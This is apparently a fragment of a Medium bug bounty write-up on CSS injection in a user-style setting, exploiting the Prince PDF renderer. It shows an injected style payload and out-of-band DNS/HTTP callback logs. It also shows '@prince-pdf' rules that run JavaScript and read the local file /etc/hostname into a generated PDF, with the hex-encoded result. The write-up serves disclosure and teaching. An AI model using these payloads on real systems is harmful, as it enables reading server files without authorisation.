Photo by FIN on Unsplash

Unleashing the power of CSS injection: The access key to an internal API

<style>
body {
color: #7c878e; /* USER-SETTING */
font-family: Arial, Helvetica, sans-serif; /* USER-SETTING */
}

.identity-text {
color: #f3f3f3;}Hi there! I am some new css but I can not escape the style tag to become xss : (
; /* USER-SETTING */
</style>
[c6029550qf512863dfOgcgynjfayyyyyn] Received DNS interaction (AAAA) from xx.xxx.xx.xx at 2021-11-01 17:32:35
[c6029550qf512863dfOgcgynjfayyyyyn] Received DNS interaction (A) from xx.xxx.xx.xxx at 2021-11-01 17:32:35
[c6029550qf512863dfOgcgynjfayyyyyn] Received HTTP interaction from xx.xxx.xx.xxx at 2021-11-01 17:32:35

This property can be used to include JavaScript code that will be executed when the PDF file is opened. A common use case is to activate the “Print” dialog automatically. The script can be located in an external JavaScript file, referenced with the url() function.

@prince-pdf {
prince-pdf-script: "this.print();"
}

The script can be located in an external JavaScript file, referenced with the url() function.

@prince-pdf { 
prince-pdf-script: url(/etc/hostname);
}
4 0 obj
<</S /JavaScript
/JS <FEFF003000330066003800320037006500610065006100350063000A>>>
endobj

--

--

Security researcher at Mission CTRL. Developer at Alserda. Bug bounty hunter on Intigriti. https://www.missionctrl.nl

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sander Wind

Security researcher at Mission CTRL. Developer at Alserda. Bug bounty hunter on Intigriti. https://www.missionctrl.nl